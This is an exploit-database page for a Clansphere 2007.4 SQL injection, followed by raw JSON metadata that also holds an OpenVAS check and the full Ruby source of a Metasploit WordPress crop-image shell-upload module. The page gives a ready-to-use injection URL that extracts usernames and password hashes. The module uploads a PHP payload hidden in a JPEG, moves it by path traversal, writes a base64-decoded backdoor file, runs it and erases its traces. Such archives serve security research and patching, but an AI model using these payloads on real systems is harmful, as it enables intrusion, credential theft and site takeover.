Search...

Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability

2007-09-22T00:00:00

ID 1337DAY-ID-2161
Type zdt
Reporter IHTeam
Modified 2007-09-22T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            =============================================================
Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability
=============================================================



#########################################################################################
#
#        Inclusion Hunter Team
#
#
#         [Clansphere 2007.4]
#
#
# Class:     SQL Injection
# Found:     22/09/2007
# Remote:    Yes
# Site:      http://www.clansphere.net/
# Author:    R00T[ATI] of IHTeam
#
#########################################################################################


       Vulnerable code:
       mods/banners/navlist.php
============================================================================================================
if(!empty($_GET['cat_id'])) {
 $where = "categories_id = '" . $_GET['cat_id'] . "'";
============================================================================================================




       Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):
===================================================================================================================
http://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu

ll%20FROM%20cs_users/*
===================================================================================================================


       Thanks To:
=================================
White_Sheep for his Bugs Hunter;
=================================




#  0day.today [2018-01-05]  #

JSON Vulners Source

Initial Source

{"hash": "a7a5311135c1880436f2cd8f29ea6e27640190c9b4269026fc13b9afc651e4d8", "id": "1337DAY-ID-2161", "lastseen": "2018-01-05T07:15:32", "viewCount": 1, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}, {"hash": "3571eadee67d15b4203d837e108549d4", "key": "href"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "modified"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "213796e4789dd8e233c042781b9efb42", "key": "reporter"}, {"hash": "0b8800f4bf25495937e1113de1bf6c71", "key": "sourceData"}, {"hash": "e1749de95cf23d9c27f0eaa75a16e504", "key": "sourceHref"}, {"hash": "b2875e3e036693eed73190ebd6cd3bcc", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 1.5, "vector": "NONE", "modified": "2018-01-05T07:15:32"}, "dependencies": {"references": [{"type": "openvas", "idList": ["OPENVAS:1361412562310876143", "OPENVAS:1361412562310814649", "OPENVAS:1361412562310852029"]}, {"type": "nessus", "idList": ["FEDORA_2018-DB0D3E157E.NASL", "FEDORA_2018-5521156807.NASL", "FEDORA_2018-527698A904.NASL", "SUSE_SU-2018-2973-1.NASL", "REDHAT-RHSA-2017-1414.NASL", "SUSE_SU-2018-2304-1.NASL", "SUSE_SU-2018-2171-1.NASL", "REDHAT-RHSA-2018-2328.NASL", "SLACKWARE_SSA_2018-208-01.NASL", "REDHAT-RHSA-2018-2161.NASL"]}, {"type": "redhat", "idList": ["RHSA-2018:3398", "RHSA-2018:3397", "RHSA-2018:2363", "RHSA-2018:2161"]}, {"type": "centos", "idList": ["CESA-2018:1965"]}], "modified": "2018-01-05T07:15:32"}, "vulnersScore": 1.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/2161", "description": "Exploit for unknown platform in category web applications", "title": "Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability", "history": [{"bulletin": {"hash": "11897d99c0a98edc4962acdde2b8c359e67238841c4ff018310b9e7f7e4e97a1", "id": "1337DAY-ID-2161", "lastseen": "2016-04-20T01:59:06", "enchantments": {"score": {"value": 9.3, "modified": "2016-04-20T01:59:06"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "b2875e3e036693eed73190ebd6cd3bcc", "key": "title"}, {"hash": "213796e4789dd8e233c042781b9efb42", "key": "reporter"}, {"hash": "7ff037c1908c525d974c29e0513ca0c8", "key": "sourceHref"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "published"}, {"hash": "a6ec852781591271ae5fc3357ba92845", "key": "sourceData"}, {"hash": "97f8bf13fc2efdca719649b4068c3a31", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "9dab50877b5ea44a95de6dcde6932702", "key": "modified"}, {"hash": "00157601768b634735774d15ccd18f9e", "key": "description"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/2161", "description": "Exploit for unknown platform in category web applications", "viewCount": 0, "title": "Clansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "=============================================================\r\nClansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\n#########################################################################################\r\n#\r\n# Inclusion Hunter Team\r\n#\r\n#\r\n# [Clansphere 2007.4]\r\n#\r\n#\r\n# Class: SQL Injection\r\n# Found: 22/09/2007\r\n# Remote: Yes\r\n# Site: http://www.clansphere.net/\r\n# Author: R00T[ATI] of IHTeam\r\n#\r\n#########################################################################################\r\n\r\n\r\n Vulnerable code:\r\n mods/banners/navlist.php\r\n============================================================================================================\r\nif(!empty($_GET['cat_id'])) {\r\n $where = \"categories_id = '\" . $_GET['cat_id'] . \"'\";\r\n============================================================================================================\r\n\r\n\r\n\r\n\r\n Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):\r\n===================================================================================================================\r\nhttp://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu\r\n\r\nll%20FROM%20cs_users/*\r\n===================================================================================================================\r\n\r\n\r\n Thanks To:\r\n=================================\r\nWhite_Sheep for his Bugs Hunter;\r\n=================================\r\n\r\n\r\n\r\n\n# 0day.today [2016-04-20] #", "published": "2007-09-22T00:00:00", "references": [], "reporter": "IHTeam", "modified": "2007-09-22T00:00:00", "href": "http://0day.today/exploit/description/2161"}, "lastseen": "2016-04-20T01:59:06", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "=============================================================\r\nClansphere 2007.4 (cat_id) Remote SQL Injection Vulnerability\r\n=============================================================\r\n\r\n\r\n\r\n#########################################################################################\r\n#\r\n# Inclusion Hunter Team\r\n#\r\n#\r\n# [Clansphere 2007.4]\r\n#\r\n#\r\n# Class: SQL Injection\r\n# Found: 22/09/2007\r\n# Remote: Yes\r\n# Site: http://www.clansphere.net/\r\n# Author: R00T[ATI] of IHTeam\r\n#\r\n#########################################################################################\r\n\r\n\r\n Vulnerable code:\r\n mods/banners/navlist.php\r\n============================================================================================================\r\nif(!empty($_GET['cat_id'])) {\r\n $where = \"categories_id = '\" . $_GET['cat_id'] . \"'\";\r\n============================================================================================================\r\n\r\n\r\n\r\n\r\n Exploit (!!!WORK ONLY WITH magic_quotes_gpc = Off!!!):\r\n===================================================================================================================\r\nhttp://www.site.com/[path]/index.php?mod=banners&cat_id=-1'%20UNION%20ALL%20SELECT%20null,concat(users_nick,0x3a,users_pwd),null,nu\r\n\r\nll%20FROM%20cs_users/*\r\n===================================================================================================================\r\n\r\n\r\n Thanks To:\r\n=================================\r\nWhite_Sheep for his Bugs Hunter;\r\n=================================\r\n\r\n\r\n\r\n\n# 0day.today [2018-01-05] #", "published": "2007-09-22T00:00:00", "references": [], "reporter": "IHTeam", "modified": "2007-09-22T00:00:00", "href": "https://0day.today/exploit/description/2161"}

{"openvas": [{"lastseen": "2019-05-29T18:32:16", "bulletinFamily": "scanner", "description": "The remote host is missing an update for the ", "modified": "2019-05-03T00:00:00", "published": "2019-05-03T00:00:00", "id": "OPENVAS:1361412562310875589", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310875589", "title": "Fedora Update for java-1.8.0-openjdk FEDORA-2019-c701e6605a", "type": "openvas", "sourceData": "# Copyright (C) 2019 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) the respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.875589\");\n script_version(\"2019-05-03T11:15:46+0000\");\n script_cve_id(\"CVE-2018-3639\");\n script_tag(name:\"cvss_base\", value:\"4.9\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:N/A:N\");\n script_tag(name:\"last_modification\", value:\"2019-05-03 11:15:46 +0000 (Fri, 03 May 2019)\");\n script_tag(name:\"creation_date\", value:\"2019-05-03 02:08:49 +0000 (Fri, 03 May 2019)\");\n script_name(\"Fedora Update for java-1.8.0-openjdk FEDORA-2019-c701e6605a\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2019 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC28\");\n\n script_xref(name:\"FEDORA\", value:\"2019-c701e6605a\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/RMCBTSYT6MYQZU3IMTTE2WBDQV5JUVZO\");\n\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'java-1.8.0-openjdk'\n package(s) announced via the FEDORA-2019-c701e6605a advisory.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable package version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The OpenJDK runtime environment 8.\");\n\n script_tag(name:\"affected\", value:\"'java-1.8.0-openjdk' package(s) on Fedora 28.\");\n\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"package\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\nreport = \"\";\n\nif(release == \"FC28\") {\n\n if(!isnull(res = isrpmvuln(pkg:\"java\", rpm:\"java~1.8.0~openjdk~1.8.0.212.b04~0.fc28\", rls:\"FC28\"))) {\n report += res;\n }\n\n if(report != \"\") {\n security_message(data:report);\n } else if (__pkg_match) {\n exit(99);\n }\n exit(0);\n}\n\nexit(0);\n", "cvss": {"score": 4.9, "vector": "AV:L/AC:L/Au:N/C:C/I:N/A:N"}}], "metasploit": [{"lastseen": "2019-11-23T00:27:49", "bulletinFamily": "exploit", "description": "This module exploits a path traversal and a local file inclusion vulnerability on WordPress versions 5.0.0 and <= 4.9.8. The crop-image function allows a user, with at least author privileges, to resize an image and perform a path traversal by changing the _wp_attached_file reference during the upload. The second part of the exploit will include this image in the current theme by changing the _wp_page_template attribute when creating a post. This exploit module only works for Unix-based systems currently.\n", "modified": "2019-04-04T20:19:58", "published": "2019-03-22T16:37:04", "id": "MSF:EXPLOIT/MULTI/HTTP/WP_CROP_RCE", "href": "", "type": "metasploit", "title": "WordPress Crop-image Shell Upload", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::FileDropper\n include Msf::Exploit::Remote::HTTP::Wordpress\n\n def initialize(info = {})\n super(update_info(\n info,\n 'Name' => 'WordPress Crop-image Shell Upload',\n 'Description' => %q{\n This module exploits a path traversal and a local file inclusion\n vulnerability on WordPress versions 5.0.0 and <= 4.9.8.\n The crop-image function allows a user, with at least author privileges,\n to resize an image and perform a path traversal by changing the _wp_attached_file\n reference during the upload. The second part of the exploit will include\n this image in the current theme by changing the _wp_page_template attribute\n when creating a post.\n\n This exploit module only works for Unix-based systems currently.\n },\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'RIPSTECH Technology', # Discovery\n 'Wilfried Becard <wilfried.becard@synacktiv.com>' # Metasploit module\n ],\n 'References' =>\n [\n [ 'CVE', '2019-8942' ],\n [ 'CVE', '2019-8943' ],\n [ 'URL', 'https://blog.ripstech.com/2019/wordpress-image-remote-code-execution/']\n ],\n 'DisclosureDate' => 'Feb 19 2019',\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['WordPress', {}]],\n 'DefaultTarget' => 0\n ))\n\n register_options(\n [\n OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),\n OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])\n ])\n end\n\n def check\n cookie = wordpress_login(username, password)\n if cookie.nil?\n store_valid_credential(user: username, private: password, proof: cookie)\n return CheckCode::Safe\n end\n\n CheckCode::Appears\n end\n\n def username\n datastore['USERNAME']\n end\n\n def password\n datastore['PASSWORD']\n end\n\n def get_wpnonce(cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'media-new.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie\n )\n if res && res.code == 200 && res.body && !res.body.empty?\n res.get_hidden_inputs.first[\"_wpnonce\"]\n end\n end\n\n def get_wpnonce2(image_id, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post' => image_id,\n 'action' => \"edit\"\n }\n )\n if res && res.code == 200 && res.body && !res.body.empty?\n tmp = res.get_hidden_inputs\n wpnonce2 = tmp[1].first[1]\n end\n end\n\n def get_current_theme\n uri = normalize_uri(datastore['TARGETURI'])\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => uri\n )\n fail_with(Failure::NotFound, 'Failed to access Wordpress page to retrieve theme.') unless res && res.code == 200 && res.body && !res.body.empty?\n\n theme = res.body.scan(/\\/wp-content\\/themes\\/(\\w+)\\//).flatten.first\n fail_with(Failure::NotFound, 'Failed to retrieve theme') unless theme\n\n theme\n end\n\n def get_ajaxnonce(cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => 'query-attachments',\n 'post_id' => '0',\n 'query[item]' => '43',\n 'query[orderby]' => 'date',\n 'query[order]' => 'DESC',\n 'query[posts_per_page]' => '40',\n 'query[paged]' => '1'\n }\n )\n fail_with(Failure::NotFound, 'Unable to reach page to retrieve the ajax nonce') unless res && res.code == 200 && res.body && !res.body.empty?\n a_nonce = res.body.scan(/\"edit\":\"(\\w+)\"/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve the ajax nonce') unless a_nonce\n\n a_nonce\n end\n\n def upload_file(img_name, wp_nonce, cookie)\n img_data = %w[\n FF D8 FF E0 00 10 4A 46 49 46 00 01 01 01 00 60 00 60 00 00 FF ED 00 38 50 68 6F\n 74 6F 73 68 6F 70 20 33 2E 30 00 38 42 49 4D 04 04 00 00 00 00 00 1C 1C 02 74 00\n 10 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B 3F 3E 1C 02 00 00 02 00 04 FF FE 00\n 3B 43 52 45 41 54 4F 52 3A 20 67 64 2D 6A 70 65 67 20 76 31 2E 30 20 28 75 73 69\n 6E 67 20 49 4A 47 20 4A 50 45 47 20 76 38 30 29 2C 20 71 75 61 6C 69 74 79 20 3D\n 20 38 32 0A FF DB 00 43 00 06 04 04 05 04 04 06 05 05 05 06 06 06 07 09 0E 09 09\n 08 08 09 12 0D 0D 0A 0E 15 12 16 16 15 12 14 14 17 1A 21 1C 17 18 1F 19 14 14 1D\n 27 1D 1F 22 23 25 25 25 16 1C 29 2C 28 24 2B 21 24 25 24 FF DB 00 43 01 06 06 06\n 09 08 09 11 09 09 11 24 18 14 18 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24\n 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24 24\n 24 24 24 24 24 24 24 FF C0 00 11 08 00 C0 01 06 03 01 22 00 02 11 01 03 11 01 FF\n C4 00 1F 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06\n 07 08 09 0A 0B FF C4 00 B5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7D 01\n 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 A1 08 23 42 B1 C1\n 15 52 D1 F0 24 33 62 72 82 09 0A 16 17 18 19 1A 25 26 27 28 29 2A 34 35 36 37 38\n 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A 73\n 74 75 76 77 78 79 7A 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2 A3 A4\n A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2 D3 D4\n D5 D6 D7 D8 D9 DA E1 E2 E3 E4 E5 E6 E7 E8 E9 EA F1 F2 F3 F4 F5 F6 F7 F8 F9 FA FF\n C4 00 1F 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06\n 07 08 09 0A 0B FF C4 00 B5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00\n 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 A1 B1 C1 09\n 23 33 52 F0 15 62 72 D1 0A 16 24 34 E1 25 F1 17 18 19 1A 26 27 28 29 2A 35 36 37\n 38 39 3A 43 44 45 46 47 48 49 4A 53 54 55 56 57 58 59 5A 63 64 65 66 67 68 69 6A\n 73 74 75 76 77 78 79 7A 82 83 84 85 86 87 88 89 8A 92 93 94 95 96 97 98 99 9A A2\n A3 A4 A5 A6 A7 A8 A9 AA B2 B3 B4 B5 B6 B7 B8 B9 BA C2 C3 C4 C5 C6 C7 C8 C9 CA D2\n D3 D4 D5 D6 D7 D8 D9 DA E2 E3 E4 E5 E6 E7 E8 E9 EA F2 F3 F4 F5 F6 F7 F8 F9 FA FF\n DA 00 0C 03 01 00 02 11 03 11 00 3F 00 3C 3F 3D 60 24 5F 47 45 54 5B 30 5D 60 3B\n 3F 3E\n ]\n img_data = [img_data.join].pack('H*')\n img_name += '.jpg'\n\n boundary = \"#{rand_text_alphanumeric(rand(10) + 5)}\"\n post_data = \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"name\\\"\\r\\n\"\n post_data << \"\\r\\n#{img_name}\\r\\n\"\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"action\\\"\\r\\n\"\n post_data << \"\\r\\nupload-attachment\\r\\n\"\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"_wpnonce\\\"\\r\\n\"\n post_data << \"\\r\\n#{wp_nonce}\\r\\n\"\n post_data << \"--#{boundary}\\r\\n\"\n post_data << \"Content-Disposition: form-data; name=\\\"async-upload\\\"; filename=\\\"#{img_name}\\\"\\r\\n\"\n post_data << \"Content-Type: image/jpeg\\r\\n\"\n post_data << \"\\r\\n#{img_data}\\r\\n\"\n post_data << \"--#{boundary}--\\r\\n\"\n print_status(\"Uploading payload\")\n upload_uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'async-upload.php')\n\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => upload_uri,\n 'ctype' => \"multipart/form-data; boundary=#{boundary}\",\n 'data' => post_data,\n 'cookie' => cookie\n )\n fail_with(Failure::UnexpectedReply, 'Unable to upload image') unless res && res.code == 200 && res.body && !res.body.empty?\n print_good(\"Image uploaded\")\n res = JSON.parse(res.body)\n image_id = res[\"data\"][\"id\"]\n update_nonce = res[\"data\"][\"nonces\"][\"update\"]\n filename = res[\"data\"][\"filename\"]\n return filename, image_id, update_nonce\n end\n\n def image_editor(img_name, ajax_nonce, image_id, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => 'image-editor',\n '_ajax_nonce' => ajax_nonce,\n 'postid' => image_id,\n 'history' => '[{\"c\":{\"x\":0,\"y\":0,\"w\":400,\"h\":300}}]',\n 'target' => 'all',\n 'context' => '',\n 'do' => 'save'\n }\n )\n fail_with(Failure::NotFound, 'Unable to access page to retrieve filename') unless res && res.code == 200 && res.body && !res.body.empty?\n filename = res.body.scan(/(#{img_name}-\\S+)-/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve file name') unless filename\n\n filename << '.jpg'\n end\n\n def change_path(wpnonce2, image_id, filename, current_date, path, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n '_wpnonce' => wpnonce2,\n 'action' => 'editpost',\n 'post_ID' => image_id,\n 'meta_input[_wp_attached_file]' => \"#{current_date}#{filename}#{path}\"\n }\n )\n end\n\n def crop_image(image_id, ajax_nonce, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => 'crop-image',\n '_ajax_nonce' => ajax_nonce,\n 'id' => image_id,\n 'cropDetails[x1]' => 0,\n 'cropDetails[y1]' => 0,\n 'cropDetails[width]' => 400,\n 'cropDetails[height]' => 300,\n 'cropDetails[dst_width]' => 400,\n 'cropDetails[dst_height]' => 300\n }\n )\n end\n\n def include_theme(shell_name, cookie)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post-new.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie\n )\n if res && res.code == 200 && res.body && !res.body.empty?\n wpnonce2 = res.body.scan(/name=\"_wpnonce\" value=\"(\\w+)\"/).flatten.first\n post_id = res.body.scan(/\"post\":{\"id\":(\\w+),/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve the second wpnonce and the post id') unless wpnonce2 && post_id\n\n post_title = Rex::Text.rand_text_alpha(10)\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n '_wpnonce'=> wpnonce2,\n 'action' => 'editpost',\n 'post_ID' => post_id,\n 'post_title' => post_title,\n 'post_name' => post_title,\n 'meta_input[_wp_page_template]' => \"cropped-#{shell_name}.jpg\"\n }\n )\n fail_with(Failure::NotFound, 'Failed to retrieve post id') unless res && res.code == 302\n post_id\n end\n end\n\n def check_for_base64(cookie, post_id)\n uri = normalize_uri(datastore['TARGETURI'])\n # Test if base64 is on target\n test_string = 'YmFzZTY0c3BvdHRlZAo='\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_get' => {\n 'p' => post_id,\n '0' => \"echo #{test_string} | base64 -d\"\n }\n )\n fail_with(Failure::NotFound, 'Unable to retrieve response to base64 command') unless res && res.code == 200 && !res.body.empty?\n\n fail_with(Failure::NotFound, \"Can't find base64 decode on target\") unless res.body.include?(\"base64spotted\")\n # Execute payload with base64 decode\n @backdoor = Rex::Text.rand_text_alpha(10)\n encoded = Rex::Text.encode_base64(payload.encoded)\n res = send_request_cgi!(\n 'method' => 'GET',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_get' => {\n 'p' => post_id,\n '0' => \"echo #{encoded} | base64 -d > #{@backdoor}.php\"\n }\n )\n\n fail_with(Failure::NotFound, 'Failed to send payload to target') unless res && res.code == 200 && !res.body.empty?\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => normalize_uri(datastore['TARGETURI'], \"#{@backdoor}.php\"),\n 'cookie' => cookie\n )\n end\n\n def wp_cleanup(shell_name, post_id, cookie)\n print_status('Attempting to clean up files...')\n uri = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'admin-ajax.php')\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => { 'action' => \"query-attachments\" }\n )\n\n fail_with(Failure::NotFound, 'Failed to receive a response for uploaded file') unless res && res.code == 200 && !res.body.empty?\n infos = res.body.scan(/id\":(\\d+),.*filename\":\"cropped-#{shell_name}\".*?\"delete\":\"(\\w+)\".*\"id\":(\\d+),.*filename\":\"cropped-x\".*?\"delete\":\"(\\w+)\".*\"id\":(\\d+),.*filename\":\"#{shell_name}\".*?\"delete\":\"(\\w+)\"/).flatten\n id1, id2, id3 = infos[0], infos[2], infos[4]\n delete_nonce1, delete_nonce2, delete_nonce3 = infos[1], infos[3], infos[5]\n for i in (0...6).step(2)\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => uri,\n 'cookie' => cookie,\n 'vars_post' => {\n 'action' => \"delete-post\",\n 'id' => infos[i],\n '_wpnonce' => infos[i+1]\n }\n )\n end\n\n uri1 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'edit.php')\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri1,\n 'cookie' => cookie\n )\n\n if res && res.code == 200 && res.body && !res.body.empty?\n post_nonce = res.body.scan(/post=#{post_id}&action=trash&_wpnonce=(\\w+)/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve post nonce') unless post_nonce\n uri2 = normalize_uri(datastore['TARGETURI'], 'wp-admin', 'post.php')\n\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri2,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post' => post_id,\n 'action' => 'trash',\n '_wpnonce' => post_nonce\n }\n )\n\n fail_with(Failure::NotFound, 'Unable to retrieve response') unless res && res.code == 302\n res = send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri1,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post_status' => \"trash\",\n 'post_type' => 'post',\n '_wpnonce' => post_nonce\n }\n )\n\n if res && res.code == 200 && res.body && !res.body.empty?\n nonce = res.body.scan(/post=#{post_id}&action=delete&_wpnonce=(\\w+)/).flatten.first\n fail_with(Failure::NotFound, 'Unable to retrieve nonce') unless nonce\n\n send_request_cgi(\n 'method' => 'GET',\n 'uri' => uri2,\n 'cookie' => cookie,\n 'vars_get' => {\n 'post' => post_id,\n 'action' => 'delete',\n '_wpnonce' => nonce\n }\n )\n end\n end\n end\n\n def exploit\n fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?\n\n print_status(\"Authenticating with WordPress using #{username}:#{password}...\")\n cookie = wordpress_login(username, password)\n fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?\n print_good(\"Authenticated with WordPress\")\n store_valid_credential(user: username, private: password, proof: cookie)\n\n print_status(\"Preparing payload...\")\n @current_theme = get_current_theme\n wp_nonce = get_wpnonce(cookie)\n @current_date = Time.now.strftime(\"%Y/%m/\")\n\n img_name = Rex::Text.rand_text_alpha(10)\n @filename1, image_id, update_nonce = upload_file(img_name, wp_nonce, cookie)\n ajax_nonce = get_ajaxnonce(cookie)\n\n @filename1 = image_editor(img_name, ajax_nonce, image_id, cookie)\n wpnonce2 = get_wpnonce2(image_id, cookie)\n\n change_path(wpnonce2, image_id, @filename1, @current_date, '?/x', cookie)\n crop_image(image_id, ajax_nonce, cookie)\n\n @shell_name = Rex::Text.rand_text_alpha(10)\n change_path(wpnonce2, image_id, @filename1, @current_date, \"?/../../../../themes/#{@current_theme}/#{@shell_name}\", cookie)\n crop_image(image_id, ajax_nonce, cookie)\n\n print_status(\"Including into theme\")\n post_id = include_theme(@shell_name, cookie)\n\n check_for_base64(cookie, post_id)\n wp_cleanup(@shell_name, post_id, cookie)\n end\n\n def on_new_session(client)\n client.shell_command_token(\"rm wp-content/uploads/#{@current_date}#{@filename1[0...10]}*\")\n client.shell_command_token(\"rm wp-content/uploads/#{@current_date}cropped-#{@filename1[0...10]}*\")\n client.shell_command_token(\"rm -r wp-content/uploads/#{@current_date}#{@filename1[0...10]}*\")\n client.shell_command_token(\"rm wp-content/themes/#{@current_theme}/cropped-#{@shell_name}.jpg\")\n client.shell_command_token(\"rm #{@backdoor}.php\")\n end\nend\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": 